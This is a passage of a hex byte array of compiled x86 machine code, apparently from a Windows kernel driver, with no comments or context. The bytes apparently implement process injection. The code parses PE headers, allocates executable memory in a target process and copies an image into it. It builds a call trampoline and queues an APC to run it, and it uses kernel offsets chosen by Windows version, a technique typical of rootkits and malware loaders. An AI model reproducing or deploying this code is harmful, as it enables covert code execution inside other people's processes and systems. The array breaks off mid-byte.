\n0x6a,0x05,0xe8,0xe9,0x16,0x00,0x00,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x0f,0x84,\r\n0x4d,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x89,0x4d,0xec,0x83,0x7d,0xec,0x00,0x0f,0x84,\r\n0x31,0x01,0x00,0x00,0x8b,0x55,0xec,0x83,0x7a,0x3c,0x00,0x0f,0x84,0x0a,0x01,0x00,\r\n0x00,0x8b,0x45,0xec,0x83,0x78,0x04,0x00,0x0f,0x86,0xfd,0x00,0x00,0x00,0x83,0x7d,\r\n0x08,0x00,0x74,0x1a,0x6a,0x01,0x8d,0x4d,0xf8,0x51,0x8b,0x55,0xec,0x83,0xc2,0x38,\r\n0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,0x75,0x19,0x83,0x7d,\r\n0x0c,0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x44,0x3b,0x55,\r\n0x0c,0x0f,0x85,0xc4,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x44,0x51,0x8b,0x55,\r\n0xec,0x83,0xc2,0x38,0x52,0x68,0x00,0x04,0x00,0x10,0xe8,0x43,0x17,0x00,0x00,0x83,\r\n0xc4,0x0c,0x8b,0x45,0x10,0x50,0x8b,0x4d,0xec,0x8b,0x91,0xdc,0x00,0x00,0x00,0x52,\r\n0xff,0x15,0x9c,0x02,0x00,0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b,\r\n0x45,0xe8,0x50,0x68,0x28,0x04,0x00,0x10,0xe8,0x15,0x17,0x00,0x00,0x83,0xc4,0x08,\r\n0x8b,0x4d,0x14,0x51,0x8b,0x55,0xec,0x8b,0x42,0x44,0x50,0xff,0x15,0x98,0x02,0x00,\r\n0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b,0x4d,0xe8,0x51,0x68,0x5c,\r\n0x04,0x00,0x10,0xe8,0xea,0x16,0x00,0x00,0x83,0xc4,0x08,0x8b,0x55,0x10,0x83,0x3a,\r\n0x00,0x74,0x10,0x8b,0x45,0x14,0x83,0x38,0x00,0x74,0x08,0xc6,0x45,0xf7,0x01,0xeb,\r\n0x54,0xeb,0x38,0x8b,0x4d,0x10,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x10,0x8b,0x0a,\r\n0xff,0x15,0x94,0x02,0x00,0x10,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,\r\n0x4d,0x14,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x14,0x8b,0x0a,0xff,0x15,0x94,0x02,\r\n0x00,0x10,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0xec,0x83,0x39,\r\n0x00,0x75,0x02,0xeb,0x10,0x8b,0x55,0xec,0x8b,0x45,0xec,0x03,0x02,0x89,0x45,0xec,\r\n0xe9,0xc5,0xfe,0xff,0xff,0x6a,0x00,0x8b,0x4d,0xf0,0x51,0xff,0x15,0x90,0x02,0x00,\r\n0x10,0x8a,0x45,0xf7,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0xe0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xd8,\r\n0x53,0x56,0x57,0x89,0x65,0xe8,0x8b,0x45,0x0c,0x8b,0x4d,0x0c,0x03,0x48,0x3c,0x89,\r\n0x4d,0xe0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0x8b,0x55,0xe0,0x8b,0x42,0x50,0x89,\r\n0x45,0xdc,0x6a,0x40,0x68,0x00,0x30,0x00,0x00,0x8d,0x4d,0xdc,0x51,0x6a,0x00,0x8d,\r\n0x55,0xd8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xe4,\r\n0x83,0x7d,0xe4,0x00,0x0f,0x8c,0x26,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x51,0x68,0x90,\r\n0x04,0x00,0x10,0xe8,0xea,0x15,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0x00,0x00,\r\n0x00,0x00,0x8b,0x55,0xdc,0x52,0x6a,0x00,0x8b,0x45,0xd8,0x50,0xe8,0xdd,0x15,0x00,\r\n0x00,0x83,0xc4,0x0c,0x8b,0x4d,0xe0,0x8b,0x51,0x54,0x52,0x8b,0x45,0x0c,0x50,0x8b,\r\n0x4d,0xd8,0x51,0xe8,0xf6,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0xe0,0x0f,0xb7,\r\n0x42,0x14,0x8b,0x4d,0xe0,0x8d,0x54,0x01,0x18,0x89,0x55,0xd4,0xc7,0x45,0xd0,0x00,\r\n0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xc0,0x01,0x89,0x45,0xd0,0x8b,0x4d,\r\n0xe0,0x0f,0xb7,0x51,0x06,0x39,0x55,0xd0,0x73,0x4d,0x8b,0x45,0xd4,0x8b,0x4d,0xd4,\r\n0x8b,0x50,0x10,0x3b,0x51,0x08,0x73,0x0b,0x8b,0x45,0xd4,0x8b,0x48,0x10,0x89,0x4d,\r\n0xcc,0xeb,0x09,0x8b,0x55,0xd4,0x8b,0x42,0x08,0x89,0x45,0xcc,0x8b,0x4d,0xcc,0x51,\r\n0x8b,0x55,0xd4,0x8b,0x45,0x0c,0x03,0x42,0x14,0x50,0x8b,0x4d,0xd4,0x8b,0x55,0xd8,\r\n0x03,0x51,0x0c,0x52,0xe8,0x85,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xd4,0x83,\r\n0xc0,0x28,0x89,0x45,0xd4,0xeb,0x9e,0x8b,0x4d,0xd8,0x51,0x8b,0x55,0xd8,0x52,0xe8,\r\n0x6c,0x12,0x00,0x00,0x0f,0xb6,0xc0,0x85,0xc0,0x74,0x18,0x8b,0x4d,0x14,0x8b,0x55,\r\n0xd8,0x89,0x11,0xc6,0x45,0xcb,0x01,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x8a,0x45,\r\n0xcb,0xeb,0x50,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,\r\n0x00,0xc3,0x8b,0x65,0xe8,0x68,0xcc,0x04,0x00,0x10,0xe8,0xf3,0x14,0x00,0x00,0x83,\r\n0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8d,0x45,0xd8,0x50,0x8b,0x4d,0x08,0x51,0xff,0x15,0xa4,0x02,0x00,0x10,0xeb,0x11,\r\n0x8b,0x55,0xe4,0x52,0x68,0xec,0x04,0x00,0x10,0xe8,0xc4,0x14,0x00,0x00,0x83,0xc4,\r\n0x08,0x32,0xc0,0x8b,0x4d,0xf0,0x64,0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,\r\n0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0xf0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xc4,0x60,\r\n0xff,0xff,0xff,0x53,0x56,0x57,0x89,0x65,0xe8,0xc6,0x45,0xdf,0x00,0xc7,0x45,0xe0,\r\n0x00,0x00,0x00,0x00,0x8d,0x45,0xe0,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x6a,0x00,\r\n0x68,0x00,0x02,0x00,0x00,0x8b,0x4d,0x08,0x51,0xff,0x15,0x24,0x03,0x00,0x10,0x89,\r\n0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x8c,0xfc,0x02,0x00,0x00,0x6a,0x00,0x6a,0x18,\r\n0x8d,0x55,0xc4,0x52,0x6a,0x00,0x8b,0x45,0xe0,0x50,0xff,0x15,0xd0,0x02,0x00,0x10,\r\n0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x7d,0x16,0x8b,0x4d,0xe4,0x51,0x68,0x20,0x05,\r\n0x00,0x10,0xe8,0x1b,0x14,0x00,0x00,0x83,0xc4,0x08,0xe9,0xbd,0x02,0x00,0x00,0x8d,\r\n0x55,0xa8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xcc,0x02,0x00,0x10,0x8b,0x4d,0xc8,\r\n0x8b,0x51,0x08,0x89,0x55,0xc0,0xc7,0x45,0xa4,0x00,0x00,0x00,0x00,0x8d,0x45,0xa4,\r\n0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0x8b,0x45,0xe0,0x50,0xe8,0x7e,0xfd,\r\n0xff,0xff,0x0f,0xb6,0xc8,0x85,0xc9,0x0f,0x84,0x75,0x02,0x00,0x00,0xc7,0x45,0xfc,\r\n0x00,0x00,0x00,0x00,0x8b,0x55,0x10,0x8b,0x45,0xa4,0x03,0x42,0x3c,0x89,0x45,0x9c,\r\n0x8b,0x4d,0x9c,0x8b,0x55,0xa4,0x03,0x51,0x28,0x89,0x55,0x94,0x8b,0x45,0x94,0x50,\r\n0x68,0x54,0x05,0x00,0x10,0xe8,0xa8,0x13,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0x8c,\r\n0x00,0x00,0x00,0x00,0x68,0x80,0x11,0x00,0x10,0xe8,0x22,0xfb,0xff,0xff,0x89,0x45,\r\n0x98,0x8b,0x4d,0x98,0x83,0xc1,0x29,0x89,0x4d,0x90,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x8d,0x55,0x90,0x52,0x6a,0x00,0x8d,0x45,0x8c,0x50,0x8b,0x4d,0xe0,0x51,0xff,\r\n0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xa0,0x83,0x7d,0xa0,0x00,0x0f,0x8c,0xc9,0x01,\r\n0x00,0x00,0x8b,0x55,0x8c,0x52,0x68,0x8c,0x05,0x00,0x10,0xe8,0x52,0x13,0x00,0x00,\r\n0x83,0xc4,0x08,0x8b,0x45,0x90,0x50,0x68,0x90,0x00,0x00,0x00,0x8b,0x4d,0x8c,0x51,\r\n0xe8,0x49,0x13,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x8c,0xc6,0x02,0x68,0x8b,0x45,\r\n0x8c,0x8b,0x4d,0xa4,0x89,0x48,0x01,0x8b,0x55,0x8c,0xc6,0x42,0x05,0xe8,0x8b,0x45,\r\n0x8c,0x83,0xc0,0x29,0x8b,0x4d,0x8c,0x83,0xc1,0x06,0x2b,0xc1,0x83,0xe8,0x04,0x8b,\r\n0x55,0x8c,0x89,0x42,0x06,0xb8,0x85,0xc0,0x00,0x00,0x8b,0x4d,0x8c,0x66,0x89,0x41,\r\n0x0a,0xba,0x0f,0x84,0x00,0x00,0x8b,0x45,0x8c,0x66,0x89,0x50,0x0c,0x8b,0x4d,0x8c,\r\n0x83,0xc1,0x26,0x8b,0x55,0x8c,0x83,0xc2,0x0e,0x2b,0xca,0x83,0xe9,0x04,0x8b,0x45,\r\n0x8c,0x89,0x48,0x0e,0x8b,0x4d,0x8c,0xc6,0x41,0x12,0x68,0x8b,0x55,0x8c,0xc7,0x42,\r\n0x13,0x00,0x00,0x00,0x00,0x8b,0x45,0x8c,0xc6,0x40,0x17,0x68,0x8b,0x4d,0x8c,0xc7,\r\n0x41,0x18,0x01,0x00,0x00,0x00,0x8b,0x55,0x8c,0xc6,0x42,0x1c,0x68,0x8b,0x45,0x8c,\r\n0x8b,0x4d,0xa4,0x89,0x48,0x1d,0x8b,0x55,0x8c,0xc6,0x42,0x21,0xe8,0x8b,0x45,0x8c,\r\n0x83,0xc0,0x22,0x8b,0x4d,0x94,0x2b,0xc8,0x83,0xe9,0x04,0x8b,0x55,0x8c,0x89,0x4a,\r\n0x22,0x8b,0x45,0x8c,0xc6,0x40,0x26,0xc2,0xb9,0x03,0x00,0x00,0x00,0x8b,0x55,0x8c,\r\n0x66,0x89,0x4a,0x27,0x8b,0x45,0x98,0x50,0x68,0x80,0x11,0x00,0x10,0x8b,0x4d,0x8c,\r\n0x83,0xc1,0x29,0x51,0xe8,0xa5,0x12,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x03,\r\n0x15,0x80,0x2d,0x00,0x10,0x89,0x55,0x88,0x6a,0x00,0x6a,0x01,0x8b,0x45,0x8c,0x50,\r\n0x6a,0x00,0x68,0xb0,0x13,0x00,0x10,0x6a,0x00,0x8b,0x4d,0x0c,0x51,0x8d,0x95,0x58,\r\n0xff,0xff,0xff,0x52,0xff,0x15,0xc8,0x02,0x00,0x10,0x8b,0x45,0x88,0xc6,0x40,0x16,\r\n0x01,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8d,0x58,0xff,0xff,0xff,0x51,0xff,0x15,\r\n0xc4,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x71,0xc7,0x85,0x50,0xff,0xff,\r\n0xff,0x80,0x69,0x67,0xff,0xc7,0x85,0x54,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x8d,\r\n0x85,0x50,0xff,0xff,0xff,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,\r\n0x10,0xff,0x15,0xc0,0x02,0x00,0x10,0x89,0x45,0xa0,0x81,0x7d,0xa0,0x02,0x01,0x00,\r\n0x00,0x75,0x0f,0x68,0xac,0x05,0x00,0x10,0xe8,0xd5,0x11,0x00,0x00,0x83,0xc4,0x04,\r\n0xeb,0x17,0x83,0x7d,0xa0,0x00,0x7c,0x11,0x68,0xe0,0x05,0x00,0x10,0xe8,0xc0,0x11,\r\n0x00,0x00,0x83,0xc4,0x04,0xc6,0x45,0xdf,0x01,0x8d,0x8d,0x50,0xff,0xff,0xff,0x51,\r\n0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0xeb,0x0d,0x68,0x08,0x06,0x00,\r\n0x10,0xe8,0x9c,0x11,0x00,0x00,0x83,0xc4,0x04,0xeb,0x11,0x8b,0x55,0xa0,0x52,0x68,\r\n0x24,0x06,0x00,0x10,0xe8,0x89,0x11,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0xff,\r\n0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,0x00,0xc3,0x8b,0x65,0xe8,0x68,0x58,\r\n0x06,0x00,0x10,0xe8,0x6a,0x11,0x00,0x00,0x83,0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,\r\n0xff,0xff,0x8d,0x45,0xa8,0x50,0xff,0x15,0xb8,0x02,0x00,0x10,0x8b,0x4d,0xe0,0x51,\r\n0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xe4,0x52,0x68,0x78,0x06,0x00,\r\n0x10,0xe8,0x3c,0x11,0x00,0x00,0x83,0xc4,0x08,0x8a,0x45,0xdf,0x8b,0x4d,0xf0,0x64,\r\n0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,\r\n0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51,\r\n0x6a,0x00,0x8b,0x55,0x08,0x52,0xe8,0xf5,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d,\r\n0xf4,0x51,0xe8,0x39,0xfc,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94,\r\n0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,\r\n0x08,0x52,0x68,0xa8,0x06,0x00,0x10,0xe8,0xb6,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a,\r\n0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,\r\n0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51,\r\n0x8b,0x55,0x08,0x52,0x6a,0x00,0xe8,0x75,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d,\r\n0xf4,0x51,0xe8,0xb9,0xfb,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94,\r\n0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,\r\n0x08,0x52,0x68,0xe8,0x06,0x00,0x10,0xe8,0x36,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a,\r\n0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0xc7,0x85,0xe0,0xfe,0xff,0xff,0x1c,\r\n0x01,0x00,0x00,0x8d,0x85,0xe0,0xfe,0xff,0xff,0x50,0xff,0x15,0xdc,0x02,0x00,0x10,\r\n0x85,0xc0,0x7d,0x07,0x32,0xc0,0xe9,0x0f,0x01,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,\r\n0xff,0x05,0x75,0x22,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x19,0xc7,0x05,0xdc,\r\n0x2d,0x00,0x10,0x89,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x34,0x00,0x00,\r\n0x00,0xe9,0xbf,0x00,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x05,0x75,0x39,0x83,\r\n0xbd,0xe8,0xfe,0xff,0xff,0x02,0x75,0x30,0xc7,0x05,0xdc,0x2d,0x00,0x10,0x8f,0x00,\r\n0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x28,0x00,0x00,0x00,0x0f,0xb7,0x4d,0xf4,\r\n0x85,0xc9,0x75,0x12,0x0f,0xb7,0x55,0xf6,0x85,0xd2,0x75,0x0a,0xc7,0x05,0x80,0x2d,\r\n0x00,0x10,0x34,0x00,0x00,0x00,0xeb,0x7d,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x06,0x75,\r\n0x3b,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x32,0x0f,0xb7,0x45,0xf4,0x85,0xc0,\r\n0x75,0x14,0x0f,0xb7,0x4d,0xf6,0x85,0xc9,0x75,0x0c,0xc7,0x05,0xdc,0x2d,0x00,0x10,\r\n0xcf,0x00,0x00,0x00,0xeb,0x0a,0xc7,0x05,0xdc,0x2d,0x00,0x10,0xd2,0x00,0x00,0x00,\r\n0xc7,0x05,0x80,0x2d,0x00,0x10,0x38,0x00,0x00,0x00,0xeb,0x39,0x83,0xbd,0xe4,0xfe,\r\n0xff,0xff,0x06,0x75,0x1f,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x16,0xc7,0x05,\r\n0xdc,0x2d,0x00,0x10,0xd7,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x40,0x00,\r\n0x00,0x00,0xeb,0x11,0x68,0x28,0x07,0x00,0x10,0xe8,0x14,0x0f,0x00,0x00,0x83,0xc4,\r\n0x04,0x32,0xc0,0xeb,0x25,0x8b,0x15,0xdc,0x2d,0x00,0x10,0x52,0x68,0x58,0x07,0x00,\r\n0x10,0xe8,0xfc,0x0e,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0x6a,0x01,0x68,0xcc,0x2d,\r\n0x00,0x10,0xff,0x15,0xd8,0x02,0x00,0x10,0xb0,0x01,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0xff,0x15,0x88,0x02,0x00,0x10,0x89,0x45,0xfc,0x81,0x7d,0xfc,\r\n0x14,0x00,0x06,0x00,0x74,0x15,0x8b,0x45,0xfc,0x50,0x68,0x88,0x07,0x00,0x10,0xe8,\r\n0xbe,0x0e,0x00,0x00,0x83,0xc4,0x08,0x32,0xc0,0xeb,0x5b,0x8b,0x4d,0x08,0x89,0x0d,\r\n0xe0,0x2d,0x00,0x10,0xc7,0x05,0x88,0x2d,0x00,0x10,0x0c,0x00,0x00,0x00,0xc7,0x05,\r\n0x8c,0x2d,0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x84,0x2d,0x00,0x10,0x24,0x00,\r\n0x00,0x00,0xc7,0x05,0x90,0x2d,0x00,0x10,0xdc,0x00,0x00,0x00,0xc7,0x05,0x94,0x2d,\r\n0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x98,0x2d,0x00,0x10,0xc0,0x01,0x00,0x00,\r\n0xc7,0x05,0x9c,0x2d,0x00,0x10,0x9c,0x01,0x00,0x00,0xc7,0x05,0xa0,0x2d,0x00,0x10,\r\n0x10,0x00,0x00,0x00,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0x00,0x2d,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xcc,\r\n0x53,0x56,0x57,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,\r\n0x00,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0x08,0x8b,0x51,0x04,\r\n0x89,0x55,0xe4,0xeb,0x08,0x8b,0x45,0xe4,0x8b,0x08,0x89,0x4d,0xe4,0x83,0x7d,0xe4,\r\n0x00,0x0f,0x84,0xa2,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x42,0x04,0x89,0x45,0xd8,\r\n0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,\r\n0x48,0x0c,0x89,0x4d,0xc0,0xeb,0x17,0x6a,0x10,0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,\r\n0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,0x00,0x10,0x89,0x45,0xc0,0x8b,0x45,\r\n0xc0,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,\r\n0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,\r\n0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,\r\n0x35,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x45,0xd4,0x03,0x42,0x08,0x89,0x45,0xd4,\r\n0x8b,0x4d,0xd8,0x8b,0x55,0xe4,0x8b,0x41,0x14,0x2b,0x42,0x08,0x89,0x45,0xdc,0x83,\r\n0x7d,0xdc,0x00,0x0f,0x8e,0xbc,0x00,0x00,0x00,0x8b,0x4d,0x10,0x8b,0x11,0x03,0x55,\r\n0xdc,0x89,0x55,0xd0,0x8b,0x45,0xd0,0x50,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,\r\n0x89,0x45,0xcc,0x83,0x7d,0xcc,0x00,0x74,0x59,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,\r\n0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,0x10,0x8b,0x08,0x51,0x8b,\r\n0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xcc,0x51,0xe8,0x60,0x0d,0x00,0x00,0x83,0xc4,\r\n0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,\r\n0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,0x4d,0xcc,0x03,0x08,0x51,\r\n0xe8,0x39,0x0d,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xcc,0x89,0x02,\r\n0xeb,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,\r\n0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,\r\n0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0x6d,0x01,0x00,0x00,0x8b,0x55,0x10,0x8b,\r\n0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45,0x0c,0x8d,\r\n0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,\r\n0x00,0x0f,0x84,0x3d,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,\r\n0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,0x48,0x0c,0x89,0x4d,0xbc,0xeb,0x17,0x6a,0x10,\r\n0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,\r\n0x00,0x10,0x89,0x45,0xbc,0x8b,0x45,0xbc,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,\r\n0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,\r\n0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,\r\n0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0xde,0x00,0x00,0x00,0x8b,0x55,0xd8,0x8b,0x42,\r\n0x14,0x89,0x45,0xdc,0x83,0x7d,0xdc,0x00,0x0f,0x8e,0xb9,0x00,0x00,0x00,0x8b,0x4d,\r\n0x10,0x8b,0x11,0x03,0x55,0xdc,0x89,0x55,0xc8,0x8b,0x45,0xc8,0x50,0x6a,0x00,0xff,\r\n0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xc4,0x83,0x7d,0xc4,0x00,0x74,0x59,0x8b,0x4d,\r\n0x0c,0x83,0x39,0x00,0x74,0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,\r\n0x10,0x8b,0x08,0x51,0x8b,0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xc4,0x51,0xe8,0x1b,\r\n0x0c,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,\r\n0x90,0x02,0x00,0x10,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,\r\n0x4d,0xc4,0x03,0x08,0x51,0xe8,0xf4,0x0b,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,\r\n0x8b,0x45,0xc4,0x89,0x02,0xeb,0x27,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,\r\n0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,\r\n0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xeb,0x2b,0x8b,0x55,\r\n0x10,0x8b,0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45,\r\n0x0c,0x8d,0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0xe9,\r\n0xb9,0xfe,0xff,0xff,0xe9,0x4c,0xfd,0xff,0xff,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,\r\n0xe8,0x02,0x00,0x00,0x00,0xeb,0x01,0xc3,0x8b,0x45,0xe0,0x8b,0x4d,0xf0,0x64,0x89,\r\n0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0x